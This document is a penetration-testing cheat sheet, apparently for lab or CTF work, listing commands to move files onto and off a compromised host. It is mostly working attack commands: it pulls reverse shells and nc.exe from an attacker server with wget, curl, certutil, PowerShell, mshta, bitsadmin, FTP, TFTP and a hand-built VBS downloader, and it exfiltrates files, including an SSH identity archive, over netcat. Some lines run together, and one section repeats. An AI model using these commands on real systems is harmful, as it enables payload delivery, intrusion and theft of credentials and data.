#
File Transfers
#
Web Download
Often times you will have to download a reverse shell or other file to the target, python simple server works great as a temporary webserver. On Local Box:
python3 -m http.server 80 # Using python3
python -m SimpleHTTPServer 80 # Using python2 (deprecated)
On Remote (Linux):
wget 10.10.10.10/file
curl http://10.10.10.10/shell.sh -o /tmp/shell.shOn Remote (Windows):
certutil.exe -urlcache -f http://10.10.10.10/nc.exe %tmp%\nc.exe
powershell -w hidden -c "wget http://10.10.10.10/nc.exe -o nc.exe"
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.10:80/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/nc.exe','C:\Users\public\nc.exe')"
mshta http://10.10.10.10/nc.exe
mshta ftp://10.10.10.10:21/nc.exe
C:\>bitsadmin /transfer nc http://10.10.10.10:80/nc.exe c:\users\public\nc.exe
#
ftp
On Local Box:
python3 -m pyftpdlib -p 21 -wOn Remote:
# Create a file with needed ftp commands
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
# Execute commands
ftp -v -n -s:ftp.txt
#
TFTP
On Local Box:
atftpd --daemon --port 69 /tftpOn Remote:
tftp -i 10.10.10.10 GET nc.exe
#
VBS wget
On windows machines you may not have an easy way of downloading files, so you can make your own wget in VBS.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe
#
using evil-winrm
you can download and upload files using evil-winrm
download winpeas.txt
upload winPEAS.bat
#
Exfiltrate files
#
using nc
On remote host:
cat backup-ssh-identity-files.tgz | nc 10.10.10.10 443 # Linux
nc -vn 10.10.10.10 443 < winpeas.txt # Windows
Get-Content winpeas.txt | .\nc.exe -vn 10.10.14.22 443 # Older versions of powershellon windows you may need to download nc.exe certutil.exe -urlcache -f http://10.10.10.10/nc.exe c:\temp\nc.exe
On local host:
nc -lnvp 443 > linpeas.text
nc -lnvp 443 > backup-identity-files.tgz.b64
#
using evil-winrm
you can download and upload files using evil-winrm
download winpeas.txt
upload winPEAS.bat